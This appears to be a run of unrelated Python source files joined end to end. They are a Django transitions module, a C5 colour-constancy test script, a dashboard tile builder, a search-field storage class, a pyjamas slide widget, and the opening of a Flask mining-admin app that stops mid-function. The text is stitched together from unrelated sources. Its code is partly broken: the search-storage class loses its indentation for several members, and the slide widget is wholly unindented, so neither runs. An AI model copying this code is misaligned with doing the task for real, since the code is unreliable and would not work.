
    Args:
        instances: objects (all of the same type) to transition.
        transition_obj_or_name: Transition instance or its name.
        field: name of the transitioned field (e.g. 'status').
        data: form data collected for the transition's actions.
        kwargs: extra context; must contain 'request' (its user is recorded
            in history and in the reversion revision).

    Returns:
        Tuple (success, attachment); success is False when any action
        raised (logged, and the surrounding transaction rolls back
        the partial work of earlier actions' saved state).
    """
    # BUGFIX: previous signature used a mutable default (data={}); a None
    # sentinel avoids the shared-default pitfall with identical behaviour.
    if data is None:
        data = {}
    first_instance = instances[0]
    _check_type_instances(instances)
    transition = _check_and_get_transition(
        first_instance, transition_obj_or_name, field
    )
    _check_instances_for_transition(instances, transition)
    _check_action_with_instances(instances, transition)
    attachment = None
    action_names = []
    runned_funcs = []
    func_history_kwargs = defaultdict(dict)
    disable_save_object = False
    for action in _order_actions_by_requirements(
        transition.actions.all(), first_instance
    ):
        logger.info('Performing action {} in transition {}'.format(
            action, transition
        ))
        func = getattr(first_instance, action.name)
        if func.disable_save_object:
            disable_save_object = True
        defaults = data.copy()
        defaults.update(kwargs)
        defaults.update({'history_kwargs': func_history_kwargs})
        # add only the form params namespaced with this action's name
        defaults.update({
            key.split('__')[1]: value
            for key, value in data.items()
            if key.startswith(action.name)
        })
        try:
            result = func(instances=instances, **defaults)
        except Exception as e:
            logger.exception(e)
            return False, None
        runned_funcs.append(func)
        action_names.append(str(getattr(
            func,
            'verbose_name',
            func.__name__.replace('_', ' ').capitalize()
        )))
        if isinstance(result, Attachment):
            attachment = result
    history_list = []
    for instance in instances:
        # target '0' (TRANSITION_ORIGINAL_STATUS) keeps the current value
        if not int(transition.target) == TRANSITION_ORIGINAL_STATUS[0]:
            setattr(instance, field, int(transition.target))
        history_kwargs = _get_history_dict(data, instance, runned_funcs)
        history_kwargs.update(func_history_kwargs[instance.pk])
        history_list.append(_generate_transition_history(
            instance=instance,
            transition=transition,
            user=kwargs['request'].user,
            attachment=attachment,
            history_kwargs=history_kwargs,
            action_names=action_names,
            field=field
        ))
        if not disable_save_object:
            # record the save in a reversion revision for auditability
            with transaction.atomic(), reversion.create_revision():
                instance.save()
                reversion.set_comment('Transition {}'.format(transition))
                reversion.set_user(kwargs['request'].user)
    if history_list:
        TransitionsHistory.objects.bulk_create(history_list)
    return True, attachment
def get_available_transitions_for_field(instance, field, user=None):
    """
    Returns list of all available transitions for field.

    A transition is available when the instance's current field value is
    among the transition's source values and the given user (if any) has
    permission to run it.
    """
    if not hasattr(instance, 'transition_models'):
        # model was never registered for transitions
        return []
    transitions = Transition.objects.filter(
        model=instance.transition_models[field],
    )
    result = []
    for transition in transitions:
        # check if source field value is in values available for this transition
        # and if user has rights to execute this transition
        if (
            getattr(instance, field) in [int(s) for s in transition.source] and
            _check_user_perm_for_transition(user, transition)
        ):
            result.append(transition)
    return result
class TransitionWorkflowBase(ModelBase):
    """
    Metaclass registering models that declare TransitionField attributes
    (e.g. ``status``) and adding per-field helper methods to them.
    """
    def __new__(cls, name, bases, attrs):
        # collect attributes declared as TransitionField on the new model
        fields = [
            key for key, value in attrs.items()
            if issubclass(type(value), TransitionField)
        ]
        new_class = super().__new__(cls, name, bases, attrs)
        if fields:
            # register the model so the transition helpers can find it
            _transitions_fields[new_class] = fields
            for field in fields:
                # expose instance.get_available_transitions_for_<field>()
                # NOTE(review): django.utils.functional.curry was removed in
                # Django 3.0 - confirm before upgrading Django.
                new_class.add_to_class(
                    'get_available_transitions_for_{}'.format(field),
                    curry(get_available_transitions_for_field, field=field)
                )
        return new_class
class TransitionModel(models.Model):
    """A (model content type, field name) pair that can undergo transitions."""
    # NOTE(review): ForeignKey without on_delete - valid only on Django < 2.0.
    content_type = models.ForeignKey(ContentType)
    field_name = models.CharField(max_length=50)

    class Meta:
        unique_together = ('content_type', 'field_name')
        app_label = 'transitions'

    def __str__(self):
        return '{} {}'.format(self.content_type, self.field_name)
class Transition(models.Model):
    """A named state change defined for a TransitionModel field."""
    name = models.CharField(max_length=50)
    model = models.ForeignKey(TransitionModel)
    # list of allowed source status ids (stored as JSON)
    source = JSONField()
    # target status id as a string; '0' (TRANSITION_ORIGINAL_STATUS) keeps
    # the original value
    target = models.CharField(max_length=50)
    actions = models.ManyToManyField('Action')

    class Meta:
        unique_together = ('name', 'model')
        app_label = 'transitions'

    def __str__(self):
        return self.name

    @property
    def permission_info(self):
        """Kwargs describing the Permission that guards this transition."""
        return {
            'name': 'Can run {} transition'.format(self.name.lower()),
            'content_type': self.model.content_type,
            'codename': 'can_run_{}_transition'.format(slugify(self.name))
        }

    @classmethod
    def transitions_for_model(cls, model, user=None):
        """Return transitions defined for ``model`` runnable by ``user``."""
        content_type = ContentType.objects.get_for_model(model)
        transitions = cls.objects.filter(model__content_type=content_type)
        return [
            transition for transition in transitions
            if _check_user_perm_for_transition(user, transition)
        ]

    def get_pure_actions(self, instance):
        """Return bound methods on ``instance`` for this transition's actions."""
        return [
            getattr(instance, action.name) for action in self.actions.all()
        ]

    def has_form(self, instance):
        """Return True when any action declares form fields to render."""
        for action in self.get_pure_actions(instance):
            if getattr(action, 'form_fields', None):
                return True
        return False
class Action(models.Model):
    """A named action method attachable to transitions."""
    content_type = models.ManyToManyField(ContentType)
    name = models.CharField(max_length=50)

    class Meta:
        app_label = 'transitions'
        ordering = ['name']

    def __str__(self):
        return self.name

    @classmethod
    def actions_for_model(cls, model):
        """Return actions registered for ``model``'s content type."""
        content_type = ContentType.objects.get_for_model(model)
        return cls.objects.filter(content_type=content_type)
class TransitionsHistory(TimeStampMixin):
    """Audit log entry for a single executed transition on one object."""
    content_type = models.ForeignKey(ContentType)
    transition_name = models.CharField(max_length=255)
    source = models.CharField(max_length=50, blank=True, null=True)
    target = models.CharField(max_length=50, blank=True, null=True)
    object_id = models.IntegerField(db_index=True)
    logged_user = models.ForeignKey(settings.AUTH_USER_MODEL)
    attachment = models.ForeignKey(Attachment, blank=True, null=True)
    # extra form data captured during the transition
    kwargs = JSONField()
    # verbose names of the actions that were executed
    actions = JSONField()

    class Meta:
        app_label = 'transitions'

    def __str__(self):
        return str(self.transition_name)
def update_models_attrs():
    """
    Add to each registered class a new attribute `transition_models`, a dict
    mapping every transitionable field name to its TransitionModel row.
    """
    for model, field_names in _transitions_fields.items():
        # BUGFIX: removed a redundant duplicate get_for_model() call that
        # preceded this assignment.
        content_type = ContentType.objects.get_for_model(model)
        transition_models = {}
        for field_name in field_names:
            transition_model, _ = TransitionModel.objects.get_or_create(
                content_type=content_type,
                field_name=field_name
            )
            transition_models[field_name] = transition_model
        setattr(model, 'transition_models', transition_models)
def update_transitions_affter_migrate(**kwargs):
    """
    Create or update transitions for models which declare a field tagged
    with TRANSITION_ATTR_TAG.

    NOTE(review): the misspelled name ('affter') is kept on purpose - it is
    part of the module API (connected to post_migrate below).
    """
    sender_models = list(kwargs['sender'].get_models())
    # only process transitionable models belonging to the migrated app;
    # simplified from the previous operator.itemgetter(0) lambda
    for model, field_names in filter(
        lambda item: item[0] in sender_models,
        _transitions_fields.items()
    ):
        content_type = ContentType.objects.get_for_model(model)
        for field_name in field_names:
            transition_model, _ = TransitionModel.objects.get_or_create(
                content_type=content_type,
                field_name=field_name
            )
        # register every method carrying the transition tag as an Action
        detected_actions = inspect.getmembers(
            model, predicate=lambda x: hasattr(x, TRANSITION_ATTR_TAG)
        )
        for name, _ in detected_actions:
            action, _ = Action.objects.get_or_create(
                name=name,
            )
            action.content_type.add(content_type)
post_migrate.connect(update_transitions_affter_migrate)
@receiver(post_delete, sender=Transition)
def post_delete_transition(sender, instance, **kwargs):
    """Remove the permission guarding a transition when it is deleted."""
    Permission.objects.filter(**instance.permission_info).delete()
@receiver(pre_save, sender=Transition)
def post_save_transition(sender, instance, **kwargs):
    """Stash the previous permission info on the instance before saving.

    NOTE(review): despite its name this is a *pre_save* receiver; the
    stored `_old_permission_info` is read by the post_save handler.
    """
    if instance.pk:
        try:
            old = sender.objects.get(pk=instance.pk)
        except sender.DoesNotExist:  # raised ex. during fixtures loading
            pass
        else:
            setattr(instance, '_old_permission_info', old.permission_info)
@receiver(post_save, sender=Transition)
def create_permission(sender, instance, created, **kwargs):
    """Create or rename the Permission that guards running the transition."""
    if created:
        Permission.objects.create(**instance.permission_info)
    else:
        # transition may have been renamed: migrate the old permission
        old_info = getattr(instance, '_old_permission_info', None)
        if not old_info:
            return
        perm, created = Permission.objects.get_or_create(**old_info)
        if not created:
            Permission.objects.filter(pk=perm.pk).update(
                **instance.permission_info
            )
|
<gh_stars>0
"""
##### Copyright 2021 Google LLC. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
import argparse
import logging
import os
import numpy as np
import torch
from src import c5
from scipy.io import savemat
from src import dataset
from torch.utils.data import DataLoader
from src import ops
from torchvision.utils import save_image
from torchvision.utils import make_grid
def test_net(net, device, dir_img, batch_size=64, input_size=64, data_num=7,
             g=False, model_name='c5_model', load_hist=False,
             white_balance=False, multiple_test=False, files=None,
             cross_validation=False, save_output=True):
  """ Tests C5 network.

  Args:
    net: network object (c5.network).
    device: use 'cpu' or 'cuda' (string).
    dir_img: full path of testing set directory (string).
    batch_size: mini-batch size; default value is 64.
    input_size: Number of bins in histogram; default is 64.
    data_num: number of input histograms to C5 network (m in the paper);
      default value is 7.
    g: boolean flag to learn the gain multiplier map G; default value
      is False.
    model_name: Name of the trained model; default is 'c5_model'.
    load_hist: boolean flag to load histograms from beginning (if exists in the
      image directory); default value is False.
    white_balance: boolean to perform a diagonal correction using the estimated
      illuminant color and save output images in harddisk. The saved images
      will be located in white_balanced_images/model_name/.; default is False.
    multiple_test: boolean flag to perform ten tests as described in the
      paper; default is False.
    files: a list to override loading files located in dir_img; default is
      None.
    cross_validation: boolean flag to use three-fold cross-validation on
      files located in the 'dir_img' directory; default value is False.
    save_output: boolean flag to save the results in results/model_name/.;
      default is True.
  """
  if files is None:
    files = dataset.Data.load_files(dir_img)
  batch_size = min(batch_size, len(files))
  test = dataset.Data(files, input_size=input_size, mode='testing',
                      data_num=data_num,
                      load_hist=load_hist)
  test_loader = DataLoader(test, batch_size=batch_size, shuffle=False,
                           num_workers=8, pin_memory=True)
  logging.info(f'''Starting testing:
        Model Name: {model_name}
        Batch size: {batch_size}
        Number of input: {data_num}
        Learn G multiplier: {g}
        Input size: {input_size} x {input_size}
        Testing data: {len(files)}
        White balance: {white_balance}
        Multiple tests: {multiple_test}
        Cross validation: {cross_validation}
        Save output: {save_output}
        Device: {device.type}
  ''')
  if multiple_test:
    number_of_tests = 10
  else:
    number_of_tests = 1
  if white_balance:
    # prepare output directory for white-balanced renderings
    save_filter_dir_wb = os.path.join('white_balanced_images', model_name)
    if not os.path.exists(save_filter_dir_wb):
      if not os.path.exists('white_balanced_images'):
        os.mkdir('white_balanced_images')
      os.mkdir(save_filter_dir_wb)
      logging.info(f'Created visualization directory {save_filter_dir_wb}')
  with torch.no_grad():
    for test_i in range(number_of_tests):
      results = np.zeros((len(test), 3))  # to store estimated illuminant values
      gt = np.zeros((len(test), 3))  # to store ground-truth illuminant colors
      index = 0
      for batch in test_loader:
        model_histogram = batch['model_input_histograms']
        model_histogram = model_histogram.to(device=device,
                                             dtype=torch.float32)
        if white_balance:
          image = batch['image_rgb']
          image = image.to(device=device, dtype=torch.float32)
          file_names = batch['file_name']
        histogram = batch['histogram']
        histogram = histogram.to(device=device, dtype=torch.float32)
        gt_ill = batch['gt_ill']
        gt_ill = gt_ill.to(device=device, dtype=torch.float32)
        predicted_ill, _, _, _, _ = net(histogram, model_in_N=model_histogram)
        # only render white-balanced images on the first test pass
        if white_balance and test_i == 0:
          bs = image.shape[0]
          for c in range(3):
            # diagonal correction: scale each channel by green/channel ratio
            correction_ratio = predicted_ill[:, 1] / predicted_ill[:, c]
            correction_ratio = correction_ratio.view(bs, 1, 1)
            image[:, c, :, :] = image[:, c, :, :] * correction_ratio
          # gamma encoding for display (sRGB-like exponent)
          image = 1 * torch.pow(image, 1.0 / 2.19921875)
          for b in range(bs):
            save_image(make_grid(image[b, :, :, :], nrow=1), os.path.join(
              save_filter_dir_wb, file_names[b]))
        L = len(predicted_ill)
        results[index:index + L, :] = predicted_ill.cpu().numpy()
        gt[index:index + L, :] = gt_ill.cpu().numpy()
        index = index + L
      if save_output:
        save_dir = os.path.join('results', model_name)
        if not os.path.exists(save_dir):
          if not os.path.exists('results'):
            os.mkdir('results')
          os.mkdir(save_dir)
          logging.info(f'Created results directory {save_dir}')
        if multiple_test:
          savemat(os.path.join(save_dir, f'gt_{test_i + 1}.mat'), {'gt': gt})
          savemat(os.path.join(save_dir, f'results_{test_i + 1}.mat'),
                  {'predicted': results})
        else:
          savemat(os.path.join(save_dir, 'gt.mat'), {'gt': gt})
          savemat(os.path.join(save_dir, 'results.mat'), {'predicted': results})
  logging.info('End of testing')
def get_args(argv=None):
  """Parse command-line arguments for C5 testing.

  Args:
    argv: optional list of argument strings; defaults to sys.argv (added as
      a backward-compatible parameter, mainly for testing).

  Returns:
    argparse.Namespace with the parsed options.
  """
  def _str2bool(value):
    # BUGFIX: argparse's type=bool treats ANY non-empty string (including
    # 'False') as True; parse common textual booleans explicitly instead.
    if isinstance(value, bool):
      return value
    lowered = value.lower()
    if lowered in ('yes', 'true', 't', 'y', '1'):
      return True
    if lowered in ('no', 'false', 'f', 'n', '0'):
      return False
    raise argparse.ArgumentTypeError('Boolean value expected.')

  parser = argparse.ArgumentParser(description='Test C5.')
  parser.add_argument('-b', '--batch-size', metavar='B', type=int,
                      nargs='?', default=64,
                      help='Batch size', dest='batchsize')
  parser.add_argument('-s', '--input-size', dest='input_size', type=int,
                      default=64, help='Size of input (hist and image)')
  parser.add_argument('-ntrd', '--testing-dir-in', dest='in_tedir',
                      default='/testing_set/',
                      help='Input testing image directory')
  parser.add_argument('-lh', '--load-hist', dest='load_hist',
                      type=_str2bool, default=True,
                      help='Load histogram if exists')
  parser.add_argument('-dn', '--data-num', dest='data_num', type=int, default=7,
                      help='Number of input data for calibration')
  parser.add_argument('-lg', '--g-multiplier', type=_str2bool, default=False,
                      help='Have a G multiplier', dest='g_multiplier')
  parser.add_argument('-mt', '--multiple_test', type=_str2bool, default=True,
                      help='do 10 tests and save the results',
                      dest='multiple_test')
  parser.add_argument('-wb', '--white-balance', type=_str2bool,
                      default=False, help='save white-balanced image',
                      dest='white_balance')
  parser.add_argument('-cv', '--cross-validation', dest='cross_validation',
                      type=_str2bool, default=False,
                      help='Use three cross validation. If true, we assume '
                           'that there are three pre-trained models saved '
                           'with a postfix of the fold number. The testing '
                           'image filenames should be listed in .npy files '
                           'located in "folds" directory with the same name of '
                           'the dataset, which should be the same as the '
                           'folder name in --testing-dir-in')
  parser.add_argument('-n', '--model-name', dest='model_name',
                      default='c5_model')
  parser.add_argument('-g', '--gpu', dest='gpu', default=0, type=int)
  return parser.parse_args(argv)
if __name__ == '__main__':
  logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')
  logging.info('Testing C5')
  args = get_args()
  # prefer GPU when available; args.gpu selects the CUDA device index
  device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
  if device.type != 'cpu':
    torch.cuda.set_device(args.gpu)
  logging.info(f'Using device {device}')
  net = c5.network(input_size=args.input_size, learn_g=args.g_multiplier,
                   data_num=args.data_num, device=device)
  if args.cross_validation:
    # three-fold cross-validation: load each fold's model and file list,
    # then evaluate it on the corresponding held-out files
    dataset_name = os.path.basename(args.in_tedir)
    for fold in range(3):
      model_path = os.path.join('models', args.model_name +
                                f'_fold_{fold + 1}.pth')
      net.load_state_dict(torch.load(model_path, map_location=device))
      logging.info(f'Model loaded from {model_path}')
      net.to(device=device)
      net.eval()
      testing_files = np.load(f'folds/{dataset_name}_fold_{fold + 1}.npy')
      files = [os.path.join(args.in_tedir, os.path.basename(file)) for file in
               testing_files]
      test_net(net=net, device=device, dir_img=args.in_tedir,
               cross_validation=args.cross_validation,
               g=args.g_multiplier,
               multiple_test=args.multiple_test,
               white_balance=args.white_balance,
               files=files, data_num=args.data_num,
               batch_size=args.batchsize,
               model_name=f'{args.model_name}_fold_{fold + 1}',
               input_size=args.input_size,
               load_hist=args.load_hist)
  else:
    # single-model evaluation over the whole testing directory
    model_path = os.path.join('models', args.model_name + '.pth')
    net.load_state_dict(torch.load(model_path, map_location=device))
    logging.info(f'Model loaded from {model_path}')
    net.to(device=device)
    net.eval()
    test_net(net=net, device=device,
             data_num=args.data_num, dir_img=args.in_tedir,
             cross_validation=args.cross_validation,
             g=args.g_multiplier,
             multiple_test=args.multiple_test,
             white_balance=args.white_balance,
             batch_size=args.batchsize, model_name=args.model_name,
             input_size=args.input_size,
             load_hist=args.load_hist)
|
<filename>ddt_python/ddt_tile.py
class ddt_tile():
    """Builder for the parameter dicts describing one dashboard tile.

    A tile consists of layout parameters (``tileparameters``) plus
    tile-type-specific parameters (html form, svg plot or table), stored
    in ``specificparameters``; ``get_parameters`` merges the two.
    """

    def __init__(self, tileparameters_I=None, specificparameters_I=None):
        """Initialize the tile.

        BUGFIX: the previous signature used mutable default arguments
        ([]); None sentinels keep the original falsy-check behaviour
        without sharing state between instances.
        """
        self.tileparameters = tileparameters_I if tileparameters_I else []
        self.specificparameters = (
            specificparameters_I if specificparameters_I else []
        )

    def clear_objects(self):
        """Remove all stored parameters."""
        self.tileparameters = []
        self.specificparameters = []

    def add_objects(self, tileparameters_I, specificparameters_I):
        """Replace the stored tile and specific parameters."""
        self.tileparameters = tileparameters_I if tileparameters_I else []
        self.specificparameters = (
            specificparameters_I if specificparameters_I else []
        )

    def get_parameters(self):
        """Return the merged tile + specific parameters as one dict."""
        parameters_O = {}
        if self.tileparameters:
            parameters_O.update(self.tileparameters)
        if self.specificparameters:
            parameters_O.update(self.specificparameters)
        return parameters_O

    def make_tileparameters(self,
                            tileparameters=None,
                            tileheader='Filter menu',
                            tiletype='html',
                            tileid="filtermenu1",
                            rowid="row1",
                            colid="col1",
                            tileclass="panel panel-default",
                            rowclass="row",
                            colclass="col-sm-6",
                            ):
        """Store the tile layout parameters.

        INPUT:
        tileparameters = complete parameter dict; when truthy it overrides
            all of the keyword defaults.
        OUTPUT:
        stores the result in self.tileparameters.
        """
        if tileparameters:
            self.tileparameters = tileparameters
        else:
            self.tileparameters = {
                'tileheader': tileheader,
                'tiletype': tiletype,
                'tileid': tileid,
                'rowid': rowid,
                'colid': colid,
                'tileclass': tileclass,
                'rowclass': rowclass,
                'colclass': colclass,
            }

    def make_htmlparameters(self,
                            htmlparameters=None,
                            htmlid='filtermenuform1',
                            htmltype='form_01',
                            htmlspecific=None,
                            ):
        """Store html (form) parameters as the tile's specific parameters.

        INPUT:
        htmlparameters = complete parameter dict overriding the defaults.
        htmlspecific = extra key/values merged on top of the defaults.
        OUTPUT:
        stores the result in self.specificparameters.
        """
        if htmlparameters:
            htmlparameters_O = htmlparameters
        else:
            htmlparameters_O = {
                'htmlid': htmlid,
                "htmltype": htmltype,
            }
        if htmlspecific:
            htmlparameters_O.update(htmlspecific)
        self.specificparameters = htmlparameters_O

    def make_svgparameters(self,
                           svgparameters=None,
                           svgtype='volcanoplot2d_01',
                           svgkeymap=None,
                           svgid='svg1',
                           svgmargin=None,
                           svgfilters=None,
                           svgspecific=None,
                           ):
        """Store svg (plot) parameters as the tile's specific parameters.

        BUGFIX: the previous [] / {} defaults for svgkeymap/svgmargin were
        shared mutable objects stored directly into the result dict; None
        sentinels are converted to fresh empty containers instead.

        INPUT:
        svgparameters = complete parameter dict overriding the defaults.
        svgspecific = extra key/values merged on top of the defaults.
        OUTPUT:
        stores the result in self.specificparameters.
        """
        if svgparameters:
            svgparameters_O = svgparameters
        else:
            svgparameters_O = {
                "svgtype": svgtype,
                "svgkeymap": [] if svgkeymap is None else svgkeymap,
                'svgid': svgid,
                "svgmargin": {} if svgmargin is None else svgmargin,
                'svgfilters': svgfilters,
            }
        if svgspecific:
            svgparameters_O.update(svgspecific)
        self.specificparameters = svgparameters_O

    def make_tableparameters(self,
                             tableparameters=None,
                             tabletype='responsivetable_01',
                             tableid='table1',
                             tableclass="table table-condensed table-hover",
                             tablefilters=None,
                             tablespecific=None,
                             ):
        """Store table parameters as the tile's specific parameters.

        INPUT:
        tableparameters = {} of table parameters
        tablespecific = {} of table specific parameters
        OUTPUT:
        stores the result in self.specificparameters.
        """
        if tableparameters:
            tableparameters_O = tableparameters
        else:
            tableparameters_O = {
                "tabletype": tabletype,
                'tableid': tableid,
                "tableclass": tableclass,
                "tablefilters": tablefilters,
            }
        if tablespecific:
            tableparameters_O.update(tablespecific)
        self.specificparameters = tableparameters_O
<gh_stars>1-10
import warnings
from dataclasses import dataclass
from typing import Dict, Any, Set, Optional
from lucyfer.searchset.fields import BaseSearchField, FieldType
from lucyfer.settings import lucyfer_settings
@dataclass
class SearchSetStorage:
"""
Class provides availability to use fields in SearchSet class
"""
searchset_class: Any
# fields defined in searchset class and those instances
field_name_to_field: Dict[str, BaseSearchField]
fields_to_exclude_from_mapping: Set[str]
fields_to_exclude_from_suggestions: Set[str]
field_class_for_default_searching: Optional[BaseSearchField]
_full_mapping = None
    @property
    def mapping(self):
        """
        Returns mapping for current searchset. It looks like {field name: field}.

        That property only contains fields not excluded from original mapping.

        If you want to get values for some field in mapping - don't. You better
        use `field_source_to_field`.
        """
        return {
            name: field for name, field in self.field_source_to_field.items()
            if name not in self.fields_to_exclude_from_mapping
        }
    @property
    def raw_mapping(self) -> Dict[str, FieldType]:
        """
        Returns the searchset's raw mapping, computing and caching it on
        first access (stored on the instance as `raw_mapping_result`).
        """
        if not hasattr(self, 'raw_mapping_result'):
            result = self.searchset_class._get_raw_mapping()
            setattr(self, 'raw_mapping_result', result)
        return self.raw_mapping_result
@property
def field_source_to_field(self) -> Dict[str, BaseSearchField]:
"""
Auto generated fields by type checking in raw mapping and sources handling in defined fields
"""
if not hasattr(self, 'field_source_to_field_result'):
# first process raw mapping
source_to_field_from_raw_mapping = {
name: self.searchset_class._field_type_to_field_class.get(
field_type, self.searchset_class._default_field
)(show_suggestions=name not in self.fields_to_exclude_from_suggestions, sources=[name])
for name, field_type in self.raw_mapping.items()
}
# then process defined fields and its sources
source_to_field_from_user_fields = self.field_name_to_field.copy()
source_to_field_from_user_fields_sources = {}
# `missed_fields` uses for process possibly missed sources from case when defined
# some field in searchset like this one:
# x = SearchField(sources=["y"], use_field_class_for_sources=False)
# and when we have not found "y" in raw mapping and we have no idea what field class we need to use.
# it will be warning in the end of function.
missed_fields = []
for name, field in self.field_name_to_field.items():
if not field.sources:
continue
if not field.use_field_class_for_sources:
# we extend missed fields by all fields because after cycle we will filter it anyway
missed_fields.extend([source for source in field.sources])
continue
source_to_field_from_user_fields_sources.update(
{
source: field.__class__(sources=[source],
show_suggestions=source not in self.fields_to_exclude_from_suggestions,
get_available_values_method=field._get_available_values_method,
available_values_method_kwargs=field._available_values_method_kwargs,
use_cache_for_suggestions=field.use_cache_for_suggestions)
for source in field.sources
}
)
# now result
# we create an empty dict and update it by our dicts with order from low to high priority.
# it means if user have wrote field "A" in searchset and we have found field "A" in raw mapping
# priority of searchset is higher, so in result we will see users field, not field from raw mapping.
result = {}
result.update(source_to_field_from_raw_mapping)
result.update(source_to_field_from_user_fields_sources)
result.update(source_to_field_from_user_fields)
# and check default searching field if presented
if self.field_class_for_default_searching:
result.update({lucyfer_settings.FIELD_NAME_FOR_DEFAULT_SEARCH: self.field_class_for_default_searching})
missed_fields = [field for field in missed_fields if field not in result]
if missed_fields:
warnings.warn(f"There is some undefined fields in {self.searchset_class}: {', '.join(missed_fields)}")
setattr(self, "field_source_to_field_result", result)
return self.field_source_to_field_result
|
from Sink import Sink, SinkInfo
from pyjamas.ui.HTML import HTML
from pyjamas.ui.VerticalPanel import VerticalPanel
from SlideLoader import SlideLoader
from pyjamas.HTTPRequest import HTTPRequest
from pyjamas import Window
def esc(txt):
return txt
def urlmap(txt):
idx = txt.find("http://")
if idx == -1:
return esc(txt)
for i in range(idx, len(txt)):
c = txt[i]
if c == ' ' or c == '\n' or c == '\t':
i -= 1
break
i += 1
beg = txt[:idx]
if i == len(txt):
url = txt[idx:]
end = ''
else:
url = txt[idx:i]
end = txt[i:]
txt = esc(beg) + "<a href='%s'>" % url
txt += "%s</a>" % esc(url) + urlmap(end)
return txt
def ts(txt):
l = txt.split('\n')
r = []
for line in l:
r.append(urlmap(line))
return '<br />'.join(r)
class Slide(Sink):
def __init__(self):
Sink.__init__(self)
text="<div class='infoProse'>This is the Kitchen Sink sample. "
self.vp = VerticalPanel()
self.initWidget(self.vp)
self.loaded = False
def onShow(self):
if self.loaded:
return
name = self.name.replace(" ", "_")
name = name.lower()
HTTPRequest().asyncGet("%s.txt" % name, SlideLoader(self))
def setSlide(self, text):
self.loaded = True
ul_stack1 = 0
ul_stack2 = 0
doing_code = 0
txt = ''
text += '\n'
for line in text.split("\n"):
if doing_code:
if line == "}}":
doing_code = 0
line = "</pre>"
txt += line
self.vp.add(HTML(txt))
txt = ''
continue
if line:
txt += line
txt += "\n"
continue
line = line.strip()
ul_line = False
ul_line2 = False
add = False
if not line:
line = " "
elif line[:2] == "{{":
doing_code = 1
if len(line) > 2:
line = "<pre class='slide_code'>%s" % line[2:]
else:
line = "<pre class='slide_code'>"
elif line[:2] == '= ' and line[-2:] == ' =':
line = "<h1 class='slide_heading1'>%s</h1>" % line[2:-2]
elif line[:3] == '== ' and line[-3:] == ' ==':
line = "<h2 class='slide_heading2>%s</h2>" % line[3:-3]
elif line[:2] == '* ':
if not ul_stack1:
txt += "<ul class='slide_list1'>\n"
line = "<li class='slide_listitem1'/>%s\n" % ts(line[2:])
ul_stack1 = True
ul_line = True
elif line[:3] == '** ':
if not ul_stack2:
txt += "<ul class='slide_list2'>\n"
line = "<li class='slide_listitem2'/>%s\n" % ts(line[2:])
ul_stack2 = True
ul_line2 = True
ul_line = True
else:
if not doing_code:
line = "<p class='slide_para'>%s</p>" % line
if ul_stack2 and not ul_line2:
ul_stack2 = False
txt += "</ul>\n"
if ul_stack1 and not ul_line:
ul_stack1 = False
txt += "</ul>\n"
if not ul_stack2 and not ul_stack1 and not doing_code:
add = True
txt += line
if add:
self.vp.add(HTML(txt))
txt = ''
def onError(self, text, code):
self.vp.clear()
self.vp.add(HTML("TODO: Slide '%s' not loaded" % self.name))
self.vp.add(HTML(text))
self.vp.add(HTML(code))
def init(name, desc):
return SinkInfo(name, desc, Slide)
|
from .forms import UserLoginForm
from .models import Algorithm, Base, Currency, CurrencyApi, Pool, PoolAddress, PoolApi, User, Wallet, \
System, OperatingSystem, MiningApp, MiningDevice, Miner, MiningOperation
from .poolapi import CryptonoteApi
from .fixtures.loader import load_json
from germine import currency_api
from .rate import Rate
import click
import flask
from flask import Flask, request, render_template
from flask_admin import Admin
from flask_admin.contrib.sqla import ModelView
from flask_login import LoginManager, current_user, login_user, logout_user, login_required
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.orm.exc import NoResultFound
from urllib.parse import urlparse, urljoin
import json, os
# Devnote: Bug with SQLAlchemy 12.0, must use a later version
# see: https://github.com/flask-admin/flask-admin/issues/1583#issuecomment-355897231
app = Flask(__name__, instance_relative_config=True)
app.config.from_object('germine.config.Default')
# Flask-SQLAlchemy seems to be a dependence of Flask-Admin
db = SQLAlchemy(app)
# see: https://github.com/mitsuhiko/flask-sqlalchemy/issues/98
Base.metadata.create_all(bind=db.engine)
# Flask-Login
login_manager = LoginManager()
login_manager.init_app(app)
# Flask-Admin
admin = Admin(app, name='adminsite', template_mode='bootstrap3')
admin.add_view(ModelView(Algorithm, db.session))
admin.add_view(ModelView(Currency, db.session))
admin.add_view(ModelView(CurrencyApi, db.session))
admin.add_view(ModelView(Wallet, db.session))
admin.add_view(ModelView(PoolAddress, db.session))
admin.add_view(ModelView(PoolApi, db.session))
admin.add_view(ModelView(Pool, db.session))
admin.add_view(ModelView(System, db.session))
admin.add_view(ModelView(OperatingSystem, db.session))
admin.add_view(ModelView(MiningApp, db.session))
admin.add_view(ModelView(MiningDevice, db.session))
admin.add_view(ModelView(Miner, db.session))
admin.add_view(ModelView(MiningOperation, db.session))
# Cached Rate
rate_util = Rate()
# from: http://flask.pocoo.org/snippets/62/
def is_safe_url(target):
ref_url = urlparse(request.host_url)
test_url = urlparse(urljoin(request.host_url, target))
return test_url.scheme in ('http', 'https') and \
ref_url.netloc == test_url.netloc
@app.cli.command()
@click.argument("filename")
def json_fixture(filename):
print("Importing json fixture")
if not os.path.isabs(filename):
filename = os.path.join(app.instance_path, filename)
load_json(json.load(open(filename)), db.session)
@app.route("/")
@login_required
def index():
return "Hello, World!"
@login_manager.user_loader
def load_user(user_id):
try:
return db.session.query(User).filter(User.id == int(user_id)).one()
except NoResultFound:
return None
@app.route("/login", methods=["GET", "POST"])
def login():
form = UserLoginForm(request.form)
error = None
if request.method == 'POST' and form.validate():
try:
matched_user = db.session.query(User).filter(User.login == form.login.data).one()
if matched_user.authenticate(form.password.data):
login_user(matched_user)
flask.flash('Logged in successfully')
next = flask.request.args.get('next')
if not is_safe_url(next):
return flask.abort(400)
return flask.redirect(next or flask.url_for('index'))
else:
error = "Invalid credentials"
except NoResultFound:
error = "Invalid credentials"
return render_template('login.html', form=form, error=error)
@app.route('/logout', methods=['GET'])
@login_required
def logout():
logout_user()
return flask.redirect(flask.url_for('login'))
@app.route("/wallets")
def get_wallets():
